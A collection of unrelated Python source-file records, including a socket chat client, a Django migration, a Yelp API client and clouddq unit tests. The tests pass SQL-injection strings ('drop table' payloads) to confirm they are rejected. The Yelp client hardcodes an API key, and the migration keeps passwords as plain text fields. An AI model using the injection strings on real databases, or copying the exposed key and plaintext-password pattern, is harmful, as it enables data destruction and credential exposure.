experiment 3 removes this reduction\n #inner = Dense(time_dense_size, activation=act, name='dense1')(inner)\n\n if type_of_model == \"https://keras.io/examples/mnist_cnn/\":\n inner = Dropout(0.5)(inner)\n\n # Two layers of bidirectional GRUs\n # GRU seems to work as well, if not better than LSTM:\n gru_1 = GRU(rnn_size, return_sequences=True, kernel_initializer='he_normal', name='gru1')(inner)\n gru_1b = GRU(rnn_size, return_sequences=True, go_backwards=True, kernel_initializer='he_normal', name='gru1_b')(inner)\n gru1_merged = add([gru_1, gru_1b])\n gru_2 = GRU(rnn_size, return_sequences=True, kernel_initializer='he_normal', name='gru2')(gru1_merged)\n gru_2b = GRU(rnn_size, return_sequences=True, go_backwards=True, kernel_initializer='he_normal', name='gru2_b')(gru1_merged)\n\n # transforms RNN output to character activations:\n inner = Dense(output_size, kernel_initializer='he_normal',\n name='dense2')(concatenate([gru_2, gru_2b]))\n y_pred = Activation('softmax', name='softmax')(inner)\n\n # this intermediate point is usefull for predictions without training\n model_p = Model(inputs=input_data, outputs=y_pred)\n \n labels = Input(name='the_labels', shape=[absolute_max_string_len], dtype='float32')\n input_length = Input(name='input_length', shape=[1], dtype='int64')\n label_length = Input(name='label_length', shape=[1], dtype='int64')\n \n # Keras doesn't currently support loss funcs with extra parameters\n # so CTC loss is implemented in a lambda layer\n \n # K.Lambda wraps arbitrary expression as a Layer object.\n # Q then its called ?\n loss_out = Lambda(ctc_drop_first_2.ctc_lambda_func, output_shape=(1,), name='ctc')([y_pred, labels, input_length, label_length])\n\n\n\n model = Model(inputs=[input_data, labels, input_length, label_length], outputs=loss_out)\n \n return (model, model_p, input_data, y_pred)\n\n\n\n \n\n \n","sub_path":"src/cnn_rnn_model.py","file_name":"cnn_rnn_model.py","file_ext":"py","file_size_in_byte":4719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"153969751","text":"import threading\nimport time\ndef myfunc():\n print(\"Start a thread!\\n\")\n time.sleep(3)\n print(\"End a thread!!\\n\")\nthreads=[]\nfor i in range(5):\n th = threading.Thread(target=myfunc)\n th.start()\n threads.append(th)\nfor th in threads:\n th.join()\n","sub_path":"T_threads.py","file_name":"T_threads.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"642054855","text":"from socket import AF_INET, SOCK_STREAM, socket\nfrom threading import Thread, Lock\nimport tkinter as tk\nfrom configparser import *\nfrom helpers import unwrap_netstring\nfrom time import sleep\n\n\nclass SocketClient():\n def __init__(self, master, canvas):\n self.master = master\n self.canvas = canvas\n self.queue = []\n self.lock = Lock()\n self.token = False\n self.word = ''\n self.freeplay = False\n\n Config = ConfigParser()\n Config.read('config.ini')\n\n self.nick = Config.get('Config', 'Nickname')[:12]\n HOST = Config.get('Config', 'Host')\n PORT = int(Config.get('Config', 'Port'))\n\n self.ADDR = (HOST, PORT)\n self.BUFSIZ = 512\n\n self.force_close = False\n\n def connect(self):\n self.client_socket = socket(AF_INET, SOCK_STREAM)\n self.client_socket.connect(self.ADDR)\n\n data_string = 'usr:' + str(len(self.nick)) + ':' + self.nick\n self.client_socket.sendall(bytes(data_string, 'utf8'))\n\n self.my_msg = tk.StringVar()\n\n Thread(target=self.listen, daemon=True).start()\n # Thread(target=self.handle, daemon=True).start()\n\n def get_chat_window(self):\n frame = tk.Frame(self.master)\n\n scrollbar = tk.Scrollbar(frame)\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n\n self.msg_list = tk.Listbox(\n frame,\n height=25,\n width=50,\n yscrollcommand=scrollbar.set,\n font=('TkFixedFont', 14)\n )\n\n self.msg_list.pack(fill=tk.X)\n\n frame.pack(fill=tk.BOTH)\n\n return frame\n\n def get_entry_frame(self):\n frame = tk.Frame(self.master)\n\n entry_field = tk.Entry(frame, textvariable=self.my_msg)\n entry_field.bind('', self.send)\n entry_field.pack(fill=tk.X)\n\n send_button = tk.Button(frame, text='Send', command=self.send)\n send_button.pack(fill=tk.X)\n\n return frame\n\n def listen(self):\n while True:\n try:\n data = self.client_socket.recv(self.BUFSIZ).decode('utf8')\n Thread(target=self.handle, args=(data,), daemon=True).start()\n\n except OSError:\n print('Client connection broken.')\n break\n\n def handle(self, data):\n lst = unwrap_netstring(data)\n\n for mtype, msg in lst:\n print('RECEIVED', mtype, msg)\n\n if mtype == 'msg':\n self.msg_list.insert(tk.END, msg)\n self.msg_list.select_clear(self.msg_list.size() - 2)\n self.msg_list.select_set(tk.END)\n self.msg_list.yview(tk.END)\n\n elif mtype == 'can':\n self.canvas.update_canvas(msg, self.freeplay)\n\n elif mtype == 'tok':\n if self.token:\n self.lock.acquire()\n self.word = msg\n self.msg_list.insert(tk.END, 'Your word: %s.' % msg)\n self.msg_list.select_clear(self.msg_list.size() - 2)\n self.msg_list.select_set(tk.END)\n self.msg_list.yview(tk.END)\n self.lock.release()\n else:\n self.lock.acquire()\n self.token = True\n self.reset_all_to_defaults()\n Thread(target=self.send_canvas, daemon=True).start()\n self.canvas.allow_drawing()\n self.word = msg\n self.msg_list.insert(tk.END, 'Your word: %s.' % msg)\n self.msg_list.select_clear(self.msg_list.size() - 2)\n self.msg_list.select_set(tk.END)\n self.msg_list.yview(tk.END)\n self.lock.release()\n\n elif mtype == 'rev':\n self.word = ''\n self.token = False\n self.canvas.disallow_drawing()\n\n elif mtype == 'clr':\n self.canvas.destroy_canvas()\n\n elif mtype == 'fpe':\n if self.token is not True:\n self.lock.acquire()\n self.token = True\n self.freeplay = True\n Thread(target=self.send_canvas, daemon=True).start()\n self.canvas.allow_drawing()\n self.msg_list.insert(tk.END, 'Free play enabled.')\n self.msg_list.select_clear(self.msg_list.size() - 2)\n self.msg_list.select_set(tk.END)\n self.msg_list.yview(tk.END)\n self.lock.release()\n\n elif mtype == 'fpd':\n if self.token is True:\n self.lock.acquire()\n self.token = False\n self.freeplay = False\n Thread(target=self.send_canvas, daemon=True).start()\n self.canvas.disallow_drawing()\n self.msg_list.insert(tk.END, 'Free play disabled.')\n self.msg_list.select_clear(self.msg_list.size() - 2)\n self.msg_list.select_set(tk.END)\n self.msg_list.yview(tk.END)\n self.lock.release()\n\n else:\n print('Unknown mtype: %s, msg: %s' % (mtype, msg))\n\n def reset_all_to_defaults(self):\n color = self.canvas.painter.color\n length = str(len(color) + 1)\n msg = 'can:%s:c%s' % (length, color)\n\n brush = self.canvas.painter.brush\n length = str(len(str(brush)) + 1)\n msg += 'can:%s:b%s' % (length, str(brush))\n\n self.client_socket.sendall(bytes(msg, 'utf8'))\n\n def send_canvas(self):\n while self.token:\n if self.canvas.painter.obj:\n data = self.canvas.painter.obj.pop(0)\n self.client_socket.sendall(bytes(data, 'utf8'))\n\n def clear_canvas(self):\n if self.canvas.is_drawing():\n self.client_socket.sendall(bytes('clr:0:', 'utf8'))\n\n def reroll(self):\n if self.canvas.is_drawing():\n self.client_socket.sendall(bytes('rrl:0:', 'utf8'))\n\n def forfeit(self):\n if self.canvas.is_drawing():\n self.client_socket.sendall(bytes('fft:0:', 'utf8'))\n\n def default(self):\n self.canvas.restore_defaults()\n if self.canvas.is_drawing():\n self.client_socket.sendall(bytes('can:8:c#000000', 'utf8'))\n self.client_socket.sendall(bytes('can:2:b1', 'utf8'))\n\n def send(self, event=None):\n msg = self.my_msg.get()[:20]\n self.my_msg.set('')\n\n if msg == '{clear}':\n self.msg_list.delete(5, tk.END)\n msg = ''\n\n if self.token and self.word.lower() in msg.lower() and self.word != '':\n msg = ''\n\n if msg != '':\n netstring = 'msg:' + str(len(msg)) + ':' + msg\n try:\n self.client_socket.sendall(bytes(netstring, 'utf8'))\n if msg == '{quit}':\n self.client_socket.close()\n self.master.quit()\n except BrokenPipeError:\n self.lock.acquire()\n self.force_close = True\n self.lock.release()\n self.close()\n\n def close(self):\n if self.force_close:\n self.master.quit()\n else:\n self.my_msg.set('{quit}')\n self.send()\n self.force_close = True\n","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"189879496","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Article',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('public', models.BooleanField(default=False)),\n ('title', models.CharField(max_length=20)),\n ('content', models.TextField()),\n ('publish_time', models.DateTimeField(auto_now_add=True)),\n ('update_time', models.DateTimeField(auto_now=True)),\n ],\n options={\n 'ordering': ['-update_time'],\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Message',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('content', models.CharField(max_length=1000)),\n ('send_time', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n 'ordering': ['-send_time'],\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Tag',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=20)),\n ('num', models.IntegerField(default=0)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('username', models.CharField(max_length=15)),\n ('password', models.CharField(max_length=16)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='tag',\n name='user',\n field=models.ForeignKey(related_name='userTag_set', to='record.User'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='message',\n name='user',\n field=models.ForeignKey(related_name='userMessage_set', to='record.User'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='article',\n name='tag',\n field=models.ForeignKey(related_name='tagArticle_set', to='record.Tag'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='article',\n name='user',\n field=models.ForeignKey(related_name='userArticle_set', to='record.User'),\n preserve_default=True,\n ),\n ]\n","sub_path":"record/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"269324071","text":"from Products.CMFCore.utils import getToolByName\n\ntry:\n from zope.app.component.hooks import getSite\nexcept ImportError:\n from zope.component.hooks import getSite\n\nfrom agsci.w3c.site import translateURL\nfrom agsci.subsite.events import getPortletAssignmentMapping\n\ndef findBrokenPortlets(context, types=['Document', 'HomePage', 'Folder', 'Blog', 'Subsite', 'Section', 'Topic', 'Newsletter', 'Blog']):\n site = getSite()\n search_path = \"/\".join(context.getPhysicalPath())\n\n portal_catalog = getToolByName(site, \"portal_catalog\")\n urltool = getToolByName(site, \"portal_url\")\n \n results = portal_catalog.searchResults({'portal_type' : types, 'path' : search_path})\n \n portlet_managers = ['plone.leftcolumn', 'plone.rightcolumn', 'agcommon.centercolumn', 'agcommon.rightcolumn']\n \n broken = []\n \n for r in results:\n o = r.getObject()\n for i in portlet_managers:\n pm = getPortletAssignmentMapping(o, i)\n for pid in pm.keys():\n p = pm[pid]\n klass = str(p.__class__)\n path = \"\"\n feeds = \"\"\n portlet_type = \"\"\n found = False\n if 'plone.portlet.collection.collection.Assignment' in klass:\n path = p.target_collection\n found = True\n title = p.title\n portlet_type = \"Collection\"\n elif 'collective.portlet.feedmixer.portlet.Assignment' in klass:\n path = p.target_collection\n found = True\n title = p.title\n if p.feeds:\n feeds = \"|\".join(p.feeds.split())\n portlet_type = \"Feedmixer\"\n elif 'plone.app.portlets.portlets.navigation.Assignment' in klass:\n path = p.root\n found = True\n title = p.name\n portlet_type = \"Navigation\"\n if path:\n if path.startswith('/'):\n path = path.replace('/', '', 1)\n try:\n target = site.restrictedTraverse(path)\n except (AttributeError, KeyError):\n broken.append([\"BROKEN URL\", translateURL(o, https=True), title, path, i, klass])\n if found and feeds:\n broken.append([\"MANUAL CHECK\", translateURL(o, https=True), title, feeds, i, klass])\n \n return broken\n","sub_path":"agsci/w3c/portlet.py","file_name":"portlet.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"368649399","text":"# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pytest\n\nfrom clouddq.classes.dq_entity import get_custom_entity_configs\n\nfrom clouddq.classes.dq_entity import DqEntity\nfrom clouddq.classes.dq_row_filter import DqRowFilter\nfrom clouddq.classes.dq_rule import DqRule\nfrom clouddq.classes.dq_rule_binding import DqRuleBinding\n\nfrom clouddq.classes.rule_type import RuleType\n\n\nclass TestClasses:\n\n def test_dq_rule_parse_failure(self):\n \"\"\" \"\"\"\n with pytest.raises(ValueError):\n DqRule.from_dict(\n rule_id=\"valid\",\n kwargs={\n \"rule_type\": \"\",\n },\n )\n\n def test_dq_entity_missing_columns_failure(self):\n \"\"\" \"\"\"\n dq_entity_dict_not_valid = {\n \"source_database\": \"BIGQUERY\",\n \"table_name\": \"valid\",\n \"database_name\": \"valid\",\n \"instance_name\": \"valid\",\n }\n with pytest.raises(ValueError):\n DqEntity.from_dict(entity_id=\"valid\", kwargs=dq_entity_dict_not_valid)\n\n def test_dq_entity_invalid_source_database(self):\n \"\"\" \"\"\"\n dq_entity_dict_not_valid = {\n \"source_database\": \"invalid\",\n \"table_name\": \"valid\",\n \"database_name\": \"valid\",\n \"instance_name\": \"valid\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n with pytest.raises(NotImplementedError):\n DqEntity.from_dict(entity_id=\"valid\", kwargs=dq_entity_dict_not_valid)\n\n @pytest.mark.parametrize(\n \"configs_map,source_database,expected\",\n [\n pytest.param(\n {\"table_name\": \"table\", \"lake_name\": \"lake\", \"zone_name\": \"zone\", \"project_name\": \"project\"}, \n \"DATAPLEX\",\n \"lake_zone\",\n id=\"dataplex_native\"\n ),\n pytest.param(\n {\"table_name\": \"table\", \"database_name\": \"lake_zone\", \"project_name\": \"project\"}, \n \"DATAPLEX\",\n \"lake_zone\",\n id=\"dataplex_backwards_compatible\"\n ),\n pytest.param(\n {\"table_name\": \"table\", \"dataset_name\": \"dataset\", \"project_name\": \"project\"}, \n \"BIGQUERY\",\n \"dataset\",\n id=\"bigquery_native\"\n ),\n pytest.param(\n {\"table_name\": \"table\", \"database_name\": \"dataset\", \"project_name\": \"project\"}, \n \"BIGQUERY\",\n \"dataset\",\n id=\"bigquery_backwards_compatible\"\n ),\n ],\n )\n def test_get_custom_entity_configs_database_name(self, configs_map, source_database, expected):\n output = get_custom_entity_configs('test', configs_map, source_database, \"database_name\")\n assert output == expected\n\n def test_dq_entity_parse_bigquery_configs(self):\n \"\"\" \"\"\"\n bq_entity_input_dict = {\n \"source_database\": \"BIGQUERY\",\n \"table_name\": \"table_name\",\n \"dataset_name\": \"dataset_name\",\n \"project_name\": \"project_name\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n bq_entity_configs = DqEntity.from_dict(entity_id=\"test_bq_entity\", kwargs=bq_entity_input_dict)\n bq_entity_configs_expected = {\n \"test_bq_entity\": {\n \"source_database\": \"BIGQUERY\",\n \"table_name\": \"table_name\",\n \"database_name\": \"dataset_name\",\n \"instance_name\": \"project_name\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n }\n assert bq_entity_configs.to_dict() == bq_entity_configs_expected\n\n def test_dq_entity_parse_bigquery_configs_backwards_compatible(self):\n \"\"\" \"\"\"\n bq_entity_input_dict = {\n \"source_database\": \"BIGQUERY\",\n \"table_name\": \"table_name\",\n \"database_name\": \"dataset_name\",\n \"instance_name\": \"project_name\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n bq_entity_configs = DqEntity.from_dict(entity_id=\"test_bq_entity\", kwargs=bq_entity_input_dict)\n bq_entity_configs_expected = {\n \"test_bq_entity\": {\n \"source_database\": \"BIGQUERY\",\n \"table_name\": \"table_name\",\n \"database_name\": \"dataset_name\",\n \"instance_name\": \"project_name\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n }\n assert bq_entity_configs.to_dict() == bq_entity_configs_expected\n\n def test_dq_entity_parse_dataplex_configs(self):\n \"\"\" \"\"\"\n dataplex_entity_input_dict = {\n \"source_database\": \"DATAPLEX\",\n \"table_name\": \"table\",\n \"lake_name\": \"lake\",\n \"zone_name\": \"zone\",\n \"project_name\": \"project_name\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n dataplex_entity_configs = DqEntity.from_dict(entity_id=\"test_dataplex_entity\", kwargs=dataplex_entity_input_dict)\n dataplex_entity_configs_expected = {\n \"test_dataplex_entity\": {\n \"source_database\": \"DATAPLEX\",\n \"table_name\": \"table\",\n \"database_name\": \"lake_zone\",\n \"instance_name\": \"project_name\",\n \"columns\": {\n \"TEST_COLUMN\": {\n \"description\": \"test column description\",\n \"name\": \"test_column\",\n \"data_type\": \"STRING\"\n }},\n }\n }\n assert dataplex_entity_configs.to_dict() == dataplex_entity_configs_expected\n\n def test_dq_filter_parse_failure(self):\n \"\"\" \"\"\"\n with pytest.raises(ValueError):\n DqRowFilter.from_dict(\n row_filter_id=\"valid\",\n kwargs=dict(),\n )\n\n def test_dq_rule_binding_invalid_id_parse_failure(self):\n \"\"\" \"\"\"\n dq_rule_binding_dict_not_valid = {\n \"entity_id\": \"\",\n \"column_id\": \"\",\n \"row_filter_id\": \"\",\n \"rule_ids\": [\"invalid\"],\n }\n with pytest.raises(ValueError):\n DqRuleBinding.from_dict(\n rule_binding_id=\"valid\",\n kwargs=dq_rule_binding_dict_not_valid,\n )\n\n def test_dq_rule_binding_invalid_list_parse_failure(self):\n \"\"\" \"\"\"\n dq_rule_binding_dict_not_valid = {\n \"entity_id\": \"valid\",\n \"column_id\": \"valid\",\n \"row_filter_id\": \"valid\",\n \"rule_ids\": \"invalid\",\n }\n with pytest.raises(ValueError):\n DqRuleBinding.from_dict(\n rule_binding_id=\"valid\",\n kwargs=dq_rule_binding_dict_not_valid,\n )\n\n def test_rule_type_not_implemented(self):\n \"\"\" \"\"\"\n with pytest.raises(NotImplementedError):\n RuleType.to_sql(\"not_implemented\", dict())\n\n @pytest.mark.parametrize(\n \"params\",\n [\n dict(),\n {\"custom_sql_expr\": \"\"},\n {\"custom_sql_expr\": \"'; drop table Students; select ?;--\"},\n ],\n )\n def test_rule_type_custom_to_sql_failure(self, params):\n \"\"\" \"\"\"\n with pytest.raises(ValueError):\n RuleType.CUSTOM_SQL_EXPR.to_sql(params)\n\n def test_rule_type_custom_to_sql(self):\n \"\"\" \"\"\"\n params = {\"custom_sql_expr\": \"length(column_name) < 20\"}\n sql = RuleType.CUSTOM_SQL_EXPR.to_sql(params).substitute(column=\"column_name\")\n assert sql == params[\"custom_sql_expr\"]\n\n def test_rule_type_not_null(self):\n \"\"\" \"\"\"\n expected = \"column_name IS NOT NULL\"\n sql = RuleType.NOT_NULL.to_sql(params={}).substitute(column=\"column_name\")\n assert sql == expected\n\n def test_rule_type_not_blank(self):\n \"\"\" \"\"\"\n expected = \"TRIM(column_name) != ''\"\n sql = RuleType.NOT_BLANK.to_sql(params={}).substitute(column=\"column_name\")\n assert sql == expected\n\n @pytest.mark.parametrize(\n \"params\",\n [\n dict(),\n {\"pattern\": \"\"},\n {\"pattern\": \"&/42\"},\n {\"pattern\": \"'; drop table Students; select true;--\"},\n ],\n )\n def test_rule_type_regex_to_sql_failure(self, params):\n \"\"\" \"\"\"\n with pytest.raises(ValueError):\n RuleType.REGEX.to_sql(params)\n\n def test_rule_type_regex_to_sql(self):\n \"\"\" \"\"\"\n params = {\"pattern\": \"^[^@]+[@]{1}[^@]+$\"}\n sql = RuleType.REGEX.to_sql(params).substitute(column=\"column_name\")\n expected = \"REGEXP_CONTAINS( CAST( column_name AS STRING), '^[^@]+[@]{1}[^@]+$' )\"\n assert sql == expected\n\nif __name__ == \"__main__\":\n raise SystemExit(pytest.main([__file__, '-vv']))\n","sub_path":"tests/unit/test_classes.py","file_name":"test_classes.py","file_ext":"py","file_size_in_byte":10383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"299233732","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/ooyala/conf.py\n# Compiled at: 2011-08-18 05:15:41\nfrom ooyala.constants import OoyalaAPI\nfrom django.conf import settings\nif hasattr(settings, 'OOYALA'):\n API_KEYS = settings.OOYALA['API_KEYS']\n try:\n BASE_TEMPLATE = settings.OOYALA['BASE_TEMPLATE']\n except KeyError:\n BASE_TEMPLATE = 'ooyala/ooyala_base.html'\n\nelse:\n raise Exception('Cannot import your Ooyala API keys from settings.py')\nif hasattr(settings, 'OOYALA') and 'NO_THUMB' in settings.OOYALA:\n NO_THUMB = settings.OOYALA['NO_THUMB']\nelse:\n NO_THUMB = ''\nOOYALA_PARAMS = {OoyalaAPI.BACKLOT.QUERY: {'PARAMS': [\n 'content_type', 'statistics', 'description', 'embed_code', 'fields', 'include_deleted', 'label', 'limit', 'page_id', 'title'], \n 'REMAPS': {'embed_code': 'embedCode', 'label': 'label[0]', 'content_type': 'contentType', 'page_id': 'pageID'}, 'DEFAULTS': {}}, \n OoyalaAPI.BACKLOT.THUMB: {'PARAMS': [\n 'indicies', 'resolution', 'embed_code'], \n 'REMAPS': {'embed_code': 'embedCode', 'indicies': 'range'}, 'DEFAULTS': {'resolution': '320x240', 'indicies': '0-25'}}, \n OoyalaAPI.BACKLOT.ATTR: {'PARAMS': [\n 'title', 'description', 'flight_end', 'flight_start', 'status', 'hosted_at', 'embed_code'], \n 'REMAPS': {'embed_code': 'embedCode', 'flight_end': 'flightEnd', 'flight_start': 'flightStart', 'hosted_at': 'hostedAt'}, 'DEFAULTS': {}}, \n OoyalaAPI.BACKLOT.LABEL: {'PARAMS': [\n 'mode'], \n 'REMAPS': {}, 'DEFAULTS': {}}, \n OoyalaAPI.BACKLOT.CHANNEL: {'PARAMS': [\n 'mode', 'embed_code'], \n 'REMAPS': {'embed_code': 'channelEmbedCode'}, 'DEFAULTS': {}}, \n OoyalaAPI.ANALYTICS.ANALYTICS: {'PARAMS': [\n 'date', 'granularity', 'method', 'video'], \n 'REMAPS': {}, 'DEFAULTS': {}}}\nRENDER_SIZES = {'regular': (325, 185), \n 'large': (630, 354)}","sub_path":"pycfiles/django_ooyala-0.9.5-py2.7/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39067085","text":"import requests\nimport json\nfrom Restaurant_Class import *\nfrom yelpapi import YelpAPI\nimport random\n\nAPI_KEY = 'Qk2dfUgG4lrNZSJzUEXkU2er5jIU8iBwgRs-YxhDYoMUIloWi_vUbAeZsCpYsnimsNJG5UU4RFVXtrBHkIoLHr0IFKAvyuLKd77R2deabsJnEXmuZSyNB0FmEV0XXnYx'\nCLIENT_ID = 'BfDOXS2iHEZn79gyvf6rsw'\n\nDC = {\n \"lat\": 38.907469,\n \"long\": -77.0366787\n}\n\nloc_dev = 0.02\npref_size = 6\n\nprefs = [\n \"vegetarian\",\n \"vegan\",\n \"thai\",\n \"korean\",\n \"chinese\",\n \"steak\",\n \"salad\",\n \"italian\",\n \"hotpot\",\n \"latin\"\n]\n\nclass YelpClient():\n\n def __init__(self):\n self.yelp = YelpAPI(API_KEY)\n\n def get_tag_set(self):\n return random.sample(prefs, pref_size)\n\n def get_random_location(self):\n lat = DC[\"lat\"] + random.uniform(-loc_dev*2, loc_dev*2)\n long = DC[\"long\"] + random.uniform(-loc_dev*2, loc_dev*2)\n\n return (lat, long)\n\n def get_venues(self, lat, long, categories):\n venues = self.yelp.search_query(location='DC', latitude=lat, longitude=long, categories=categories, limit=50, open_now=True)\n return venues\n\n def generate_venue_set(self):\n lat, long = self.get_random_location()\n tags = self.get_tag_set()\n categories = ','.join(tags)\n # print(categories)\n venue_set = self.get_venues(lat, long, categories)[\"businesses\"]\n # print(venue_set)\n\n venues = []\n for v in venue_set:\n categories = [c['alias'] for c in v[\"categories\"]]\n\n address = str(v[\"location\"][\"address1\"]) + \" \" + str(v[\"location\"][\"city\"]) + \", \" + \\\n str(v[\"location\"][\"state\"]) + \" \" + \\\n str(v[\"location\"][\"zip_code\"])\n\n venue = {\n \"yelp_id\": v[\"id\"],\n \"name\": v[\"name\"],\n \"coordinates\": [v[\"coordinates\"][\"latitude\"], v[\"coordinates\"][\"longitude\"]],\n \"address\": address,\n \"categories\": categories,\n \"image\": v[\"image_url\"]\n }\n venues.append(venue)\n\n return venues\n \n\ndef PullandSort():\n loc = 'https://api.yelp.com/v3/businesses/search'\n headers = {'Authorization': 'Bearer ' + API_KEY}\n\n restaurants = []\n offset = 0\n check = 0\n for y in range(360//50):\n params = {'location': 'DC', 'sort_by': 'rating', 'open_now': True,\n 'categories': 'food', 'limit': '50', 'offset': str(offset)}\n raw = requests.get(loc, params=params, headers=headers)\n raw = raw.json()\n if raw[\"total\"] == 0:\n break\n for resta in raw[\"businesses\"]:\n print(resta)\n print(\"\\n\")\n fulladdress = str(resta[\"location\"][\"address1\"]) + \" \" + str(resta[\"location\"][\"city\"]) + \", \" + \\\n str(resta[\"location\"][\"state\"]) + \" \" + \\\n str(resta[\"location\"][\"zip_code\"])\n\n categories = [c['alias'] for c in resta[\"categories\"]]\n coordinates = [resta[\"coordinates\"][\"latitude\"],\n resta[\"coordinates\"][\"longitude\"]]\n restaurants.append(Restaurant(\n resta[\"name\"], coordinates, categories, fulladdress, resta[\"image_url\"]))\n check += 1\n offset += 50\n\n# yc = YelpClient()\n# lat, long = yc.get_random_location()\n# tags = yc.get_tag_set()\n# categories = ','.join(tags)\n# venue = yc.get_venues(lat, long, categories)\n# print(venue)","sub_path":"server/DataGeneration.py","file_name":"DataGeneration.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"381133912","text":"# coding=utf-8\nfrom lxml import etree\n\nfrom libcms.libs.common.xslt_transformers import xslt_transformer\n\n\ndef xml_doc_to_dict(xmlstring_doc):\n doc_tree = etree.XML(xmlstring_doc)\n doc_tree_t = xslt_transformer(doc_tree)\n return doc_tree_to_dict(doc_tree_t)\n\n\ndef doc_tree_to_dict(doc_tree):\n doc_dict = {}\n for element in doc_tree.getroot().getchildren():\n attrib = element.attrib['name']\n value = element.text\n # если поле пустое, пропускаем\n if not value: continue\n # value = beautify(value)\n values = doc_dict.get(attrib, None)\n if not values:\n doc_dict[attrib] = [value]\n else:\n values.append(value)\n return doc_dict\n","sub_path":"libcms/apps/newinlib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"490585693","text":"import torch\nimport torch.nn.functional as F\n\n\nclass ClassificationLoss(torch.nn.Module):\n def forward(self, input, target):\n \"\"\"\n\n Compute mean(-log(softmax(input)_label))\n\n @input: torch.Tensor((B,C))\n @target: torch.Tensor((B,), dtype=torch.int64)\n\n @return: torch.Tensor((,))\n\n \"\"\"\n m = torch.nn.LogSoftmax(dim = 1)\n loss = torch.nn.NLLLoss()\n return loss(m(input), target)\n #raise NotImplementedError('ClassificationLoss.forward')\n\n\nclass LinearClassifier(torch.nn.Module):\n def __init__(self):\n super().__init__()\n \n self.linear = torch.nn.Linear(3*64*64, 6)\n #raise NotImplementedError('LinearClassifier.__init__')\n\n def forward(self, x):\n \"\"\"\n @x: torch.Tensor((B,3,64,64))\n @return: torch.Tensor((B,6))\n \"\"\" \n \n x = x.view(-1, 3*64*64)\n return self.linear(x)\n #raise NotImplementedError('LinearClassifier.forward')\n\n\nclass MLPClassifier(torch.nn.Module):\n def __init__(self):\n super().__init__()\n\n #self.activation = torch.nn.ReLU()\n #self.linearlayer1 = torch.nn.Linear(3 * 64 * 64, 2048) \n #self.linearlayer2 = torch.nn.Linear(2048, 6)\n self.layers = torch.nn.Sequential(torch.nn.Linear(3*64*64, 100), torch.nn.ReLU(), torch.nn.Linear(100, 6))\n \n #raise NotImplementedError('MLPClassifier.__init__')\n\n def forward(self, x):\n #@x: torch.Tensor((B,3,64,64))\n #@return: torch.Tensor((B,6))\n x = x.view(x.size(0), -1)\n #x = x.view(-1, 3*64*64)\n #return torch.nn.Sequential(self.linearlayer1(x), self.activation(x), 